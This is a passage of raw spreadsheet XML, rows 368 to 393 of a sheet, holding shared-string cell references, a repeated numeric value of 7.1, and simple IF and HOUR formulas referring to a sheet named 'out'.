      <c r="O368" s="13"/>
      <c r="P368" s="4"/>
      <c r="Q368" s="13">
        <f>HOUR(out!$P368 -out!$N368)</f>
        <v>0</v>
      </c>
      <c r="R368" s="18"/>
      <c r="S368" s="4"/>
      <c r="T368" s="4"/>
      <c r="U368" s="4"/>
      <c r="V368" s="7"/>
    </row>
    <row r="369" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A369" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B369" s="4" t="s">
        <v>2168</v>
      </c>
      <c r="C369" s="4" t="s">
        <v>2169</v>
      </c>
      <c r="D369" s="4" t="s">
        <v>2170</v>
      </c>
      <c r="E369" s="4" t="s">
        <v>2171</v>
      </c>
      <c r="F369" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G369" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H369" s="4">
        <v>7.1</v>
      </c>
      <c r="I369" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J369" s="4"/>
      <c r="K369" s="4"/>
      <c r="L369" s="4">
        <f>IF(out!$G369="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M369" s="4"/>
      <c r="N369" s="4"/>
      <c r="O369" s="13"/>
      <c r="P369" s="4"/>
      <c r="Q369" s="13">
        <f>HOUR(out!$P369 -out!$N369)</f>
        <v>0</v>
      </c>
      <c r="R369" s="18"/>
      <c r="S369" s="4"/>
      <c r="T369" s="4"/>
      <c r="U369" s="4"/>
      <c r="V369" s="7"/>
    </row>
    <row r="370" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A370" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B370" s="4" t="s">
        <v>2172</v>
      </c>
      <c r="C370" s="4" t="s">
        <v>2173</v>
      </c>
      <c r="D370" s="4" t="s">
        <v>2174</v>
      </c>
      <c r="E370" s="4" t="s">
        <v>2175</v>
      </c>
      <c r="F370" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G370" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H370" s="4">
        <v>7.1</v>
      </c>
      <c r="I370" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J370" s="4"/>
      <c r="K370" s="4"/>
      <c r="L370" s="4">
        <f>IF(out!$G370="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M370" s="4"/>
      <c r="N370" s="4"/>
      <c r="O370" s="13"/>
      <c r="P370" s="4"/>
      <c r="Q370" s="13">
        <f>HOUR(out!$P370 -out!$N370)</f>
        <v>0</v>
      </c>
      <c r="R370" s="18"/>
      <c r="S370" s="4"/>
      <c r="T370" s="4"/>
      <c r="U370" s="4"/>
      <c r="V370" s="7"/>
    </row>
    <row r="371" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A371" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B371" s="4" t="s">
        <v>2176</v>
      </c>
      <c r="C371" s="4" t="s">
        <v>2177</v>
      </c>
      <c r="D371" s="4" t="s">
        <v>2178</v>
      </c>
      <c r="E371" s="4" t="s">
        <v>2179</v>
      </c>
      <c r="F371" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G371" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H371" s="4">
        <v>7.1</v>
      </c>
      <c r="I371" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J371" s="4"/>
      <c r="K371" s="4"/>
      <c r="L371" s="4">
        <f>IF(out!$G371="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M371" s="4"/>
      <c r="N371" s="4"/>
      <c r="O371" s="13"/>
      <c r="P371" s="4"/>
      <c r="Q371" s="13">
        <f>HOUR(out!$P371 -out!$N371)</f>
        <v>0</v>
      </c>
      <c r="R371" s="18"/>
      <c r="S371" s="4"/>
      <c r="T371" s="4"/>
      <c r="U371" s="4"/>
      <c r="V371" s="7"/>
    </row>
    <row r="372" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A372" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B372" s="4" t="s">
        <v>2180</v>
      </c>
      <c r="C372" s="4" t="s">
        <v>2181</v>
      </c>
      <c r="D372" s="4" t="s">
        <v>2182</v>
      </c>
      <c r="E372" s="4" t="s">
        <v>2183</v>
      </c>
      <c r="F372" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G372" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H372" s="4">
        <v>7.1</v>
      </c>
      <c r="I372" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J372" s="4"/>
      <c r="K372" s="4"/>
      <c r="L372" s="4">
        <f>IF(out!$G372="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M372" s="4"/>
      <c r="N372" s="4"/>
      <c r="O372" s="13"/>
      <c r="P372" s="4"/>
      <c r="Q372" s="13">
        <f>HOUR(out!$P372 -out!$N372)</f>
        <v>0</v>
      </c>
      <c r="R372" s="18"/>
      <c r="S372" s="4"/>
      <c r="T372" s="4"/>
      <c r="U372" s="4"/>
      <c r="V372" s="7"/>
    </row>
    <row r="373" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A373" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B373" s="4" t="s">
        <v>2184</v>
      </c>
      <c r="C373" s="4" t="s">
        <v>2185</v>
      </c>
      <c r="D373" s="4" t="s">
        <v>2186</v>
      </c>
      <c r="E373" s="4" t="s">
        <v>2187</v>
      </c>
      <c r="F373" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G373" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H373" s="4">
        <v>7.1</v>
      </c>
      <c r="I373" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J373" s="4"/>
      <c r="K373" s="4"/>
      <c r="L373" s="4">
        <f>IF(out!$G373="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M373" s="4"/>
      <c r="N373" s="4"/>
      <c r="O373" s="13"/>
      <c r="P373" s="4"/>
      <c r="Q373" s="13">
        <f>HOUR(out!$P373 -out!$N373)</f>
        <v>0</v>
      </c>
      <c r="R373" s="18"/>
      <c r="S373" s="4"/>
      <c r="T373" s="4"/>
      <c r="U373" s="4"/>
      <c r="V373" s="7"/>
    </row>
    <row r="374" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A374" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B374" s="4" t="s">
        <v>2188</v>
      </c>
      <c r="C374" s="4" t="s">
        <v>2189</v>
      </c>
      <c r="D374" s="4" t="s">
        <v>2190</v>
      </c>
      <c r="E374" s="4" t="s">
        <v>2191</v>
      </c>
      <c r="F374" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G374" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H374" s="4">
        <v>7.1</v>
      </c>
      <c r="I374" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J374" s="4"/>
      <c r="K374" s="4"/>
      <c r="L374" s="4">
        <f>IF(out!$G374="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M374" s="4"/>
      <c r="N374" s="4"/>
      <c r="O374" s="13"/>
      <c r="P374" s="4"/>
      <c r="Q374" s="13">
        <f>HOUR(out!$P374 -out!$N374)</f>
        <v>0</v>
      </c>
      <c r="R374" s="18"/>
      <c r="S374" s="4"/>
      <c r="T374" s="4"/>
      <c r="U374" s="4"/>
      <c r="V374" s="7"/>
    </row>
    <row r="375" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A375" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B375" s="4" t="s">
        <v>2192</v>
      </c>
      <c r="C375" s="4" t="s">
        <v>2193</v>
      </c>
      <c r="D375" s="4" t="s">
        <v>2194</v>
      </c>
      <c r="E375" s="4" t="s">
        <v>2195</v>
      </c>
      <c r="F375" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G375" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H375" s="4">
        <v>7.1</v>
      </c>
      <c r="I375" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J375" s="4"/>
      <c r="K375" s="4"/>
      <c r="L375" s="4">
        <f>IF(out!$G375="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M375" s="4"/>
      <c r="N375" s="4"/>
      <c r="O375" s="13"/>
      <c r="P375" s="4"/>
      <c r="Q375" s="13">
        <f>HOUR(out!$P375 -out!$N375)</f>
        <v>0</v>
      </c>
      <c r="R375" s="18"/>
      <c r="S375" s="4"/>
      <c r="T375" s="4"/>
      <c r="U375" s="4"/>
      <c r="V375" s="7"/>
    </row>
    <row r="376" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A376" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B376" s="4" t="s">
        <v>2196</v>
      </c>
      <c r="C376" s="4" t="s">
        <v>2197</v>
      </c>
      <c r="D376" s="4" t="s">
        <v>2198</v>
      </c>
      <c r="E376" s="4" t="s">
        <v>2199</v>
      </c>
      <c r="F376" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G376" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H376" s="4">
        <v>7.1</v>
      </c>
      <c r="I376" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J376" s="4"/>
      <c r="K376" s="4"/>
      <c r="L376" s="4">
        <f>IF(out!$G376="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M376" s="4"/>
      <c r="N376" s="4"/>
      <c r="O376" s="13"/>
      <c r="P376" s="4"/>
      <c r="Q376" s="13">
        <f>HOUR(out!$P376 -out!$N376)</f>
        <v>0</v>
      </c>
      <c r="R376" s="18"/>
      <c r="S376" s="4"/>
      <c r="T376" s="4"/>
      <c r="U376" s="4"/>
      <c r="V376" s="7"/>
    </row>
    <row r="377" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A377" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B377" s="4" t="s">
        <v>2200</v>
      </c>
      <c r="C377" s="4" t="s">
        <v>2201</v>
      </c>
      <c r="D377" s="4" t="s">
        <v>2202</v>
      </c>
      <c r="E377" s="4" t="s">
        <v>2203</v>
      </c>
      <c r="F377" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G377" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H377" s="4">
        <v>7.1</v>
      </c>
      <c r="I377" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J377" s="4"/>
      <c r="K377" s="4"/>
      <c r="L377" s="4">
        <f>IF(out!$G377="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M377" s="4"/>
      <c r="N377" s="4"/>
      <c r="O377" s="13"/>
      <c r="P377" s="4"/>
      <c r="Q377" s="13">
        <f>HOUR(out!$P377 -out!$N377)</f>
        <v>0</v>
      </c>
      <c r="R377" s="18"/>
      <c r="S377" s="4"/>
      <c r="T377" s="4"/>
      <c r="U377" s="4"/>
      <c r="V377" s="7"/>
    </row>
    <row r="378" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A378" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B378" s="4" t="s">
        <v>2204</v>
      </c>
      <c r="C378" s="4" t="s">
        <v>2205</v>
      </c>
      <c r="D378" s="4" t="s">
        <v>2206</v>
      </c>
      <c r="E378" s="4" t="s">
        <v>2207</v>
      </c>
      <c r="F378" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G378" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H378" s="4">
        <v>7.1</v>
      </c>
      <c r="I378" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J378" s="4"/>
      <c r="K378" s="4"/>
      <c r="L378" s="4">
        <f>IF(out!$G378="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M378" s="4"/>
      <c r="N378" s="4"/>
      <c r="O378" s="13"/>
      <c r="P378" s="4"/>
      <c r="Q378" s="13">
        <f>HOUR(out!$P378 -out!$N378)</f>
        <v>0</v>
      </c>
      <c r="R378" s="18"/>
      <c r="S378" s="4"/>
      <c r="T378" s="4"/>
      <c r="U378" s="4"/>
      <c r="V378" s="7"/>
    </row>
    <row r="379" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A379" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B379" s="4" t="s">
        <v>2208</v>
      </c>
      <c r="C379" s="4" t="s">
        <v>2209</v>
      </c>
      <c r="D379" s="4" t="s">
        <v>2210</v>
      </c>
      <c r="E379" s="4" t="s">
        <v>2211</v>
      </c>
      <c r="F379" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G379" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H379" s="4">
        <v>7.1</v>
      </c>
      <c r="I379" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J379" s="4"/>
      <c r="K379" s="4"/>
      <c r="L379" s="4">
        <f>IF(out!$G379="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M379" s="4"/>
      <c r="N379" s="4"/>
      <c r="O379" s="13"/>
      <c r="P379" s="4"/>
      <c r="Q379" s="13">
        <f>HOUR(out!$P379 -out!$N379)</f>
        <v>0</v>
      </c>
      <c r="R379" s="18"/>
      <c r="S379" s="4"/>
      <c r="T379" s="4"/>
      <c r="U379" s="4"/>
      <c r="V379" s="7"/>
    </row>
    <row r="380" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A380" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B380" s="4" t="s">
        <v>2212</v>
      </c>
      <c r="C380" s="4" t="s">
        <v>2213</v>
      </c>
      <c r="D380" s="4" t="s">
        <v>2214</v>
      </c>
      <c r="E380" s="4" t="s">
        <v>2215</v>
      </c>
      <c r="F380" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G380" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H380" s="4">
        <v>7.1</v>
      </c>
      <c r="I380" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J380" s="4"/>
      <c r="K380" s="4"/>
      <c r="L380" s="4">
        <f>IF(out!$G380="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M380" s="4"/>
      <c r="N380" s="4"/>
      <c r="O380" s="13"/>
      <c r="P380" s="4"/>
      <c r="Q380" s="13">
        <f>HOUR(out!$P380 -out!$N380)</f>
        <v>0</v>
      </c>
      <c r="R380" s="18"/>
      <c r="S380" s="4"/>
      <c r="T380" s="4"/>
      <c r="U380" s="4"/>
      <c r="V380" s="7"/>
    </row>
    <row r="381" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A381" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B381" s="4" t="s">
        <v>2216</v>
      </c>
      <c r="C381" s="4" t="s">
        <v>2217</v>
      </c>
      <c r="D381" s="4" t="s">
        <v>2218</v>
      </c>
      <c r="E381" s="4" t="s">
        <v>2219</v>
      </c>
      <c r="F381" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G381" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H381" s="4">
        <v>7.1</v>
      </c>
      <c r="I381" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J381" s="4"/>
      <c r="K381" s="4"/>
      <c r="L381" s="4">
        <f>IF(out!$G381="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M381" s="4"/>
      <c r="N381" s="4"/>
      <c r="O381" s="13"/>
      <c r="P381" s="4"/>
      <c r="Q381" s="13">
        <f>HOUR(out!$P381 -out!$N381)</f>
        <v>0</v>
      </c>
      <c r="R381" s="18"/>
      <c r="S381" s="4"/>
      <c r="T381" s="4"/>
      <c r="U381" s="4"/>
      <c r="V381" s="7"/>
    </row>
    <row r="382" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A382" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B382" s="4" t="s">
        <v>2220</v>
      </c>
      <c r="C382" s="4" t="s">
        <v>2221</v>
      </c>
      <c r="D382" s="4" t="s">
        <v>2222</v>
      </c>
      <c r="E382" s="4" t="s">
        <v>2223</v>
      </c>
      <c r="F382" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G382" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H382" s="4">
        <v>7.1</v>
      </c>
      <c r="I382" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J382" s="4"/>
      <c r="K382" s="4"/>
      <c r="L382" s="4">
        <f>IF(out!$G382="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M382" s="4"/>
      <c r="N382" s="4"/>
      <c r="O382" s="13"/>
      <c r="P382" s="4"/>
      <c r="Q382" s="13">
        <f>HOUR(out!$P382 -out!$N382)</f>
        <v>0</v>
      </c>
      <c r="R382" s="18"/>
      <c r="S382" s="4"/>
      <c r="T382" s="4"/>
      <c r="U382" s="4"/>
      <c r="V382" s="7"/>
    </row>
    <row r="383" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A383" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B383" s="4" t="s">
        <v>2224</v>
      </c>
      <c r="C383" s="4" t="s">
        <v>2225</v>
      </c>
      <c r="D383" s="4" t="s">
        <v>2226</v>
      </c>
      <c r="E383" s="4" t="s">
        <v>2227</v>
      </c>
      <c r="F383" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G383" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H383" s="4">
        <v>7.1</v>
      </c>
      <c r="I383" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J383" s="4"/>
      <c r="K383" s="4"/>
      <c r="L383" s="4">
        <f>IF(out!$G383="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M383" s="4"/>
      <c r="N383" s="4"/>
      <c r="O383" s="13"/>
      <c r="P383" s="4"/>
      <c r="Q383" s="13">
        <f>HOUR(out!$P383 -out!$N383)</f>
        <v>0</v>
      </c>
      <c r="R383" s="18"/>
      <c r="S383" s="4"/>
      <c r="T383" s="4"/>
      <c r="U383" s="4"/>
      <c r="V383" s="7"/>
    </row>
    <row r="384" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A384" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B384" s="4" t="s">
        <v>2228</v>
      </c>
      <c r="C384" s="4" t="s">
        <v>2229</v>
      </c>
      <c r="D384" s="4" t="s">
        <v>2230</v>
      </c>
      <c r="E384" s="4" t="s">
        <v>2231</v>
      </c>
      <c r="F384" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G384" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H384" s="4">
        <v>7.1</v>
      </c>
      <c r="I384" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J384" s="4"/>
      <c r="K384" s="4"/>
      <c r="L384" s="4">
        <f>IF(out!$G384="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M384" s="4"/>
      <c r="N384" s="4"/>
      <c r="O384" s="13"/>
      <c r="P384" s="4"/>
      <c r="Q384" s="13">
        <f>HOUR(out!$P384 -out!$N384)</f>
        <v>0</v>
      </c>
      <c r="R384" s="18"/>
      <c r="S384" s="4"/>
      <c r="T384" s="4"/>
      <c r="U384" s="4"/>
      <c r="V384" s="7"/>
    </row>
    <row r="385" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A385" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B385" s="4" t="s">
        <v>2232</v>
      </c>
      <c r="C385" s="4" t="s">
        <v>2233</v>
      </c>
      <c r="D385" s="4" t="s">
        <v>2234</v>
      </c>
      <c r="E385" s="4" t="s">
        <v>2235</v>
      </c>
      <c r="F385" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G385" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H385" s="4">
        <v>7.1</v>
      </c>
      <c r="I385" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J385" s="4"/>
      <c r="K385" s="4"/>
      <c r="L385" s="4">
        <f>IF(out!$G385="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M385" s="4"/>
      <c r="N385" s="4"/>
      <c r="O385" s="13"/>
      <c r="P385" s="4"/>
      <c r="Q385" s="13">
        <f>HOUR(out!$P385 -out!$N385)</f>
        <v>0</v>
      </c>
      <c r="R385" s="18"/>
      <c r="S385" s="4"/>
      <c r="T385" s="4"/>
      <c r="U385" s="4"/>
      <c r="V385" s="7"/>
    </row>
    <row r="386" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A386" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B386" s="4" t="s">
        <v>2236</v>
      </c>
      <c r="C386" s="4" t="s">
        <v>2237</v>
      </c>
      <c r="D386" s="4" t="s">
        <v>2238</v>
      </c>
      <c r="E386" s="4" t="s">
        <v>2239</v>
      </c>
      <c r="F386" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G386" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H386" s="4">
        <v>7.1</v>
      </c>
      <c r="I386" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J386" s="4"/>
      <c r="K386" s="4"/>
      <c r="L386" s="4">
        <f>IF(out!$G386="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M386" s="4"/>
      <c r="N386" s="4"/>
      <c r="O386" s="13"/>
      <c r="P386" s="4"/>
      <c r="Q386" s="13">
        <f>HOUR(out!$P386 -out!$N386)</f>
        <v>0</v>
      </c>
      <c r="R386" s="18"/>
      <c r="S386" s="4"/>
      <c r="T386" s="4"/>
      <c r="U386" s="4"/>
      <c r="V386" s="7"/>
    </row>
    <row r="387" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A387" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B387" s="4" t="s">
        <v>2240</v>
      </c>
      <c r="C387" s="4" t="s">
        <v>2241</v>
      </c>
      <c r="D387" s="4" t="s">
        <v>2242</v>
      </c>
      <c r="E387" s="4" t="s">
        <v>2243</v>
      </c>
      <c r="F387" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G387" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H387" s="4">
        <v>7.1</v>
      </c>
      <c r="I387" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J387" s="4"/>
      <c r="K387" s="4"/>
      <c r="L387" s="4">
        <f>IF(out!$G387="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M387" s="4"/>
      <c r="N387" s="4"/>
      <c r="O387" s="13"/>
      <c r="P387" s="4"/>
      <c r="Q387" s="13">
        <f>HOUR(out!$P387 -out!$N387)</f>
        <v>0</v>
      </c>
      <c r="R387" s="18"/>
      <c r="S387" s="4"/>
      <c r="T387" s="4"/>
      <c r="U387" s="4"/>
      <c r="V387" s="7"/>
    </row>
    <row r="388" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A388" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B388" s="4" t="s">
        <v>2244</v>
      </c>
      <c r="C388" s="4" t="s">
        <v>2245</v>
      </c>
      <c r="D388" s="4" t="s">
        <v>2246</v>
      </c>
      <c r="E388" s="4" t="s">
        <v>2247</v>
      </c>
      <c r="F388" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G388" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H388" s="4">
        <v>7.1</v>
      </c>
      <c r="I388" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J388" s="4"/>
      <c r="K388" s="4"/>
      <c r="L388" s="4">
        <f>IF(out!$G388="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M388" s="4"/>
      <c r="N388" s="4"/>
      <c r="O388" s="13"/>
      <c r="P388" s="4"/>
      <c r="Q388" s="13">
        <f>HOUR(out!$P388 -out!$N388)</f>
        <v>0</v>
      </c>
      <c r="R388" s="18"/>
      <c r="S388" s="4"/>
      <c r="T388" s="4"/>
      <c r="U388" s="4"/>
      <c r="V388" s="7"/>
    </row>
    <row r="389" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A389" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B389" s="4" t="s">
        <v>2248</v>
      </c>
      <c r="C389" s="4" t="s">
        <v>2249</v>
      </c>
      <c r="D389" s="4" t="s">
        <v>2250</v>
      </c>
      <c r="E389" s="4" t="s">
        <v>2251</v>
      </c>
      <c r="F389" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G389" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H389" s="4">
        <v>7.1</v>
      </c>
      <c r="I389" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J389" s="4"/>
      <c r="K389" s="4"/>
      <c r="L389" s="4">
        <f>IF(out!$G389="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M389" s="4"/>
      <c r="N389" s="4"/>
      <c r="O389" s="13"/>
      <c r="P389" s="4"/>
      <c r="Q389" s="13">
        <f>HOUR(out!$P389 -out!$N389)</f>
        <v>0</v>
      </c>
      <c r="R389" s="18"/>
      <c r="S389" s="4"/>
      <c r="T389" s="4"/>
      <c r="U389" s="4"/>
      <c r="V389" s="7"/>
    </row>
    <row r="390" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A390" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B390" s="4" t="s">
        <v>2252</v>
      </c>
      <c r="C390" s="4" t="s">
        <v>2253</v>
      </c>
      <c r="D390" s="4" t="s">
        <v>2254</v>
      </c>
      <c r="E390" s="4" t="s">
        <v>2255</v>
      </c>
      <c r="F390" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G390" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H390" s="4">
        <v>7.1</v>
      </c>
      <c r="I390" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J390" s="4"/>
      <c r="K390" s="4"/>
      <c r="L390" s="4">
        <f>IF(out!$G390="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M390" s="4"/>
      <c r="N390" s="4"/>
      <c r="O390" s="13"/>
      <c r="P390" s="4"/>
      <c r="Q390" s="13">
        <f>HOUR(out!$P390 -out!$N390)</f>
        <v>0</v>
      </c>
      <c r="R390" s="18"/>
      <c r="S390" s="4"/>
      <c r="T390" s="4"/>
      <c r="U390" s="4"/>
      <c r="V390" s="7"/>
    </row>
    <row r="391" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A391" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B391" s="4" t="s">
        <v>2256</v>
      </c>
      <c r="C391" s="4" t="s">
        <v>2257</v>
      </c>
      <c r="D391" s="4" t="s">
        <v>2258</v>
      </c>
      <c r="E391" s="4" t="s">
        <v>2259</v>
      </c>
      <c r="F391" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G391" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H391" s="4">
        <v>7.1</v>
      </c>
      <c r="I391" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J391" s="4"/>
      <c r="K391" s="4"/>
      <c r="L391" s="4">
        <f>IF(out!$G391="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M391" s="4"/>
      <c r="N391" s="4"/>
      <c r="O391" s="13"/>
      <c r="P391" s="4"/>
      <c r="Q391" s="13">
        <f>HOUR(out!$P391 -out!$N391)</f>
        <v>0</v>
      </c>
      <c r="R391" s="18"/>
      <c r="S391" s="4"/>
      <c r="T391" s="4"/>
      <c r="U391" s="4"/>
      <c r="V391" s="7"/>
    </row>
    <row r="392" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A392" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B392" s="4" t="s">
        <v>2260</v>
      </c>
      <c r="C392" s="4" t="s">
        <v>2261</v>
      </c>
      <c r="D392" s="4" t="s">
        <v>2262</v>
      </c>
      <c r="E392" s="4" t="s">
        <v>2263</v>
      </c>
      <c r="F392" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G392" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H392" s="4">
        <v>7.1</v>
      </c>
      <c r="I392" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J392" s="4"/>
      <c r="K392" s="4"/>
      <c r="L392" s="4">
        <f>IF(out!$G392="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M392" s="4"/>
      <c r="N392" s="4"/>
      <c r="O392" s="13"/>
      <c r="P392" s="4"/>
      <c r="Q392" s="13">
        <f>HOUR(out!$P392 -out!$N392)</f>
        <v>0</v>
      </c>
      <c r="R392" s="18"/>
      <c r="S392" s="4"/>
      <c r="T392" s="4"/>
      <c r="U392" s="4"/>
      <c r="V392" s="7"/>
    </row>
    <row r="393" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A393" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B393" s="4" t="s">
        <v>2264</v>
      </c>
      <c r="C393" s="4" t="s">
        <v>2265</v>
      </c>
      <c r="D393" s="4" t="s">
        <v>2266</v>
      </c>
      <c r="E393" s="4" t="s">
        <v>2267</v>
      </c>
      <c r="F393" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G393" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H393" s="4">
        <v>7.1</v>
      </c>
      <c r="I393" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J393" s="4"/>
      <c r="K393" s="4"/>
      <c r="L393" s="4">
        <f>IF(out!$G393="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M393" s="4"/>
      <c r="N393" s="4"/>
      <c r="O393" s="13"/>
      <c r="P393" s="4"/>
      <c r="Q393" s="13">
